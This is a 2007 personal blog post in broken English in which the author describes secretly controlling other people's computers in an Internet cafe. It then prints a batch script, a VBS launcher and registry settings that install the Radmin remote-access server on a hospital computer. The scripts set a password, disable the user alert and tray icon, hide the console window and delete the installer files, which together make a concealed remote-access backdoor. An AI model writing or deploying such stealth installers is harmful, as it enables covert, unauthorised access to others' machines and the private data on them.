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Tuesday, January 09, 2007

Install radmin for the computer

I like remote-ctrol,since i touch the computer.Because it will produce the feeling of hack.
At the begainning,use the BinHe to control the neignboring computer in the Internet cafe.Like the feeling to control others without their attention.More,to pursuse the technology of Internet.
Today,I want to install a radmin for the computer in the hospital.The goal is that to decrease degree of the difficulty in the job:
All files:Admdll.dll,raddrv.dll ,r_server.exe(These are the neccessory file of the server),install.bat,system.reg,r_server.vbs(These are the file I wrote.)
Introduce the content of the file i wrote.
@echo off //Disable show command to user
regedit /s system.reg //The set of the r_server.exe's registry
r_server /install
r_server /pass:******* /s
r_server /save /s
r_server /silence //Disable the alert
r_server /start
del system.reg
del r_server.vbs
del install.bat
r_server.vbs:  //Use it to remove the black window of the cmd
Set ws=CreateObject("Wscript.Shell") "cmd /c install.bat",vbhide
Windows Registry Editor Version 5.00





"DisableTrayIcon"=hex:01,00,00,00 //Disable the icon in the taskbar

Right or wrong decide by yourself, praise or blame listen to the others, gain or loss placid as usual, success or failure return to the zero.


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